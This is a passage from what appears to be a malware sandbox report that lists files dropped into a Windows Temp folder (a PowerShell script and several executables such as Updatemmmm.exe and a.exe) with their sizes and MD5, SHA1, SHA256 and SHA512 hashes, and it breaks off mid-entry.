          • C:\Users\Admin\AppData\Local\Temp\CDCA.tmp\CDCB.tmp\CDDC.ps1

            Filesize

            740B

            MD5

            22dc53962d540ea7f5b1c0136d6692a6

            SHA1

            e48f5b886c8fb54f1c78479d0b456e704900e61a

            SHA256

            d8a521d33228a8b545dc2fd29455a2c366795edbfc6a0eb72162a3291539327f

            SHA512

            c754ea47725437e5c0659b42da93edeba4693ff964298865897ab52af0c436d1bc946a9305311f4481ace38e38c677f555bd97a030ab82537e4648e67046f3b5

          • C:\Users\Admin\AppData\Local\Temp\CabBF3C.tmp

            Filesize

            70KB

            MD5

            49aebf8cbd62d92ac215b2923fb1b9f5

            SHA1

            1723be06719828dda65ad804298d0431f6aff976

            SHA256

            b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

            SHA512

            bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

          • C:\Users\Admin\AppData\Local\Temp\Files\Updatemmmm.exe

            Filesize

            2.6MB

            MD5

            61d3abff46a6bd2946925542c7d30397

            SHA1

            1fed80a136e67a5b7b6846010a5853400886ee9c

            SHA256

            b1a351ee61443b8558934dca6b2fa9efb0a6d2d18bae61ace5a761596604dbfa

            SHA512

            e9e25995faff34da94d30394474471dba45f5993a2efd07f5fb8c15cfdf7b3efa7c89d6796c66323938a1c31b3b89bd7578bef7c4297c6a9b68811f00aa89975

          • C:\Users\Admin\AppData\Local\Temp\Files\a.exe

            Filesize

            96KB

            MD5

            930c41bc0c20865af61a95bcf0c3b289

            SHA1

            cecf37c3b6c76d9a79dd2a97cfc518621a6ac924

            SHA256

            1f2e9724dfb091059ae16c305601e21d64b5308df76ddef6b394573e576ef1ff

            SHA512

            fa1f33c71da608b3980038981220fcebee0b0cc44331e52f5198dd2761c97631ee8286756c2cc16245a1370c83bb53cc8ea8ef64e0fcdd30af51f023973986b2

          • C:\Users\Admin\AppData\Local\Temp\Files\a14.exe

            Filesize
